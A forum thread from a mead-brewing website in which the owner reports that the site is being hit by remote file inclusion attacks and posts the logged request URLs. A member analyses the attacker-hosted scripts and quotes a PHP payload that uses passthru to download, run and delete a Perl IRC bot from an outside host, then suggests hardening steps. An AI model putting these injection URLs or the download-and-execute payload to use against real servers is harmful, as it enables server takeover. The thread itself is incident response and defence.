• PATRONS: Did you know we've a chat function for you now? Look to the bottom of the screen, you can chat, set up rooms, talk to each other individually or in groups! Click 'Chat' at the right side of the chat window to open the chat up.
  • Love Gotmead and want to see it grow? Then consider supporting the site and becoming a Patron! If you're logged in, click on your username to the right of the menu to see how as little as $30/year can get you access to the patron areas and the patron Facebook group and to support Gotmead!
  • We now have a Patron-exclusive Facebook group! Patrons my join at The Gotmead Patron Group. You MUST answer the questions, providing your Patron membership, when you request to join so I can verify your Patron membership. If the questions aren't answered, the request will be turned down.

Gotmead.com being exploited by IRC hacks - any suggestions?

pain

GotMead Owner
Staff member
Administrator
Moderator
Apr 5, 1996
1,635
3
38
North Carolina
gotmead.com
Gang, I'm working on the search issue, but my host just informed me that we're being exploited by IRC hackers, to wit:

Code:
/component/option,com_pccookbook/page,viewrecipe/recipe_id,119/mead-research/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/component/option,com_pccookbook/page,viewrecipe/cat_id,1/recipe_id,1/mead-research/component/option,com_smf/Itemid,183/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt?
//components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
//components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/index.php?option=com_smf&Itemid=397&action=login//modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
//modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vampirehack/Strings.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vampirehack/Strings.txt?
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://aespeechanddrama.org/components/com_smf/echo.txt??
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
If you are an expert in php security or know of ways to block this, please email me at gotmead AT gotmead DOT com. I'm working on this, but am hampered by not being able to change the core code of the site without trashing the whole site.

Vicky - harried and typing as fast as I can
 

Arjan

NewBee
Registered Member
Jun 22, 2007
170
0
0
44
a quick google on the problem i found out theres a security leak in the Joomla <-> SMF bridge which can be exploited by iRC

i dont know the writers/programmers of the bridge, but perhaps check their website for an update
 

Arjan

NewBee
Registered Member
Jun 22, 2007
170
0
0
44
Vicky - GM Webmistress said:
If you are an expert in php security or know of ways to block this, please email me at gotmead AT gotmead DOT com. I'm working on this, but am hampered by not being able to change the core code of the site without trashing the whole site.

Vicky - harried and typing as fast as I can
a tip i got (had about the same experiences on my community and GM has gone through..)
went from an opensource forum to a commercial one.

i never ever regretted the day i decided to convert my forums to vBulletin. it's well worth the money, and very easy to add some mods (which are all checked by vBulleting developers) that do the same as GM has now (articles + forum)

theyre are two options in that whic h i can recommend:
either vBAdvanced (for portal and articles) + vBulletin
or vBAdvanced (for portal) + vBulletin + mediawiki (for articles) (i prefer this one.. see my site as an example: www.birthright.net )
 

zionpsyfer

Got Mead? Patron
GotMead Patron
May 17, 2007
58
0
0
Denver
Vicky,

I'm no expert on XSS, nor am I familiar with SMF. But looking at the logs you posted, it appears that the poor script kiddie is running a script that's just brute force attempting various combinations in the hope that one will work.

Some of the tools linked to in the logs are :
http://www.freewebtown.com/vampirehack/Strings.txt ( just as it sounds, a list of strings indicating vulnerable installations)
http://www.thomashamilton.net/id.txt (poor welding company is being used to host this)
http://aespeechanddrama.org/components/com_smf/echo.txt (this just contains a php command to echo "1122548")
http://www.the-esao.com/imag/stringa.txt (php script to check for permissions to execute the exec(),shell_exec(),system() or passthrough() functions, grabbing the current disk usage)
http://paginas.terra.com.br/lazer/lunero/id.txt (another php script to check the OS and permissions to execute commands. This script attempts to play around with cookies. It determines the username that apache is running as, as well as which kernel release the webserver is running. It then sets cookies with that data. This is very useful if you're going to try to completely take over the machine.)

Sprinkled throughout are attempted fopens to http://someone.co.il/onfokh.gif?
No surprise here, but there's not an image at that url... instead there is a *gasp* php script that contains the following code

Code:
<?
passthru('cd /var/tmp;wget [url]http://someone.co.il/someone.txt;perl[/url] someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;curl -O [url]http://someone.co.il/someone.txt;perl[/url] someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;lwp-download [url]http://someone.co.il/someone.txt;perl[/url] someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;lynfile.txt -source [url]http://someone.co.il/someone.txt;perl[/url] someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;fetch [url]http://someone.co.il/someone.txt;perl[/url] someone.txt;rm -rf someone.txt*');
passthru('cd /var/tmp;GET [url]http://someone.co.il/someone.txt;perl[/url] someone.txt;rm -rf someone.txt*');
?>
:)
So they're trying to get the webserver to download and execute the perl script at http://someone.co.il/someone.txt, removing it afterwards.

Now, a lot of that perl script is in portuguese.... But they set up the script to join channel ' ##ddos3## ' on the server internetron.bsd.st.

My brain is starting to bleed from all the portuguese perl (and I thought perl couldn't get any worse!) But I see a sub in there for DCC file transfers. Then again this looks like a modified DDos script, so that may be left over. At any rate though, I'm not going to finish reading it... whatever it's doing it won't be good.

My advice in addition to blocking the IP address block of the originating attack, I'd block internetron.bsd.st ( 209.63.212.17 ) as well as irc.gigachat.net ( 66.252.24.10 ) (gigachat.net is mentioned in the comments of the perl script, though I didn't see it used).

If your host is willing (and it won't break anything), I'd also disable shell_exec, passthru, proc_open, proc_close, proc_get-status, proc_nice, proc_terminate, exec and system in the php.ini. This may very well not be feasible, at the very least allow-url-fopen should be disabled.

Just a guess, but if he had broken in he probably would have left his nice little card that he spent so much time on. Following that we'd probably be constantly bombarded by nasty posts throughout the forum and admins might find themselves locked out.


Hope this helps in some way.
 

Oskaar

Got Mead Partner
Administrator
Dec 26, 2004
7,874
5
0
31
The OC
Thanks for dangerous journey through the Portugese perl!

We've got most of what you pointed out done at the php.ini level and the bridge hacks have been also been shut down. There are a couple of things that we're working with our new host on, and we'll be sure to see about the additional php.ini suggestions you made.

thanks so much for the analysis,

Oskaar
 

zionpsyfer

Got Mead? Patron
GotMead Patron
May 17, 2007
58
0
0
Denver
Yeah I was pretty late on the reply. :-[ On the bright side, it was an interesting rabbit hole to play around in. ;)


Glad you guys have got it covered! :icon_thumright:



Cheers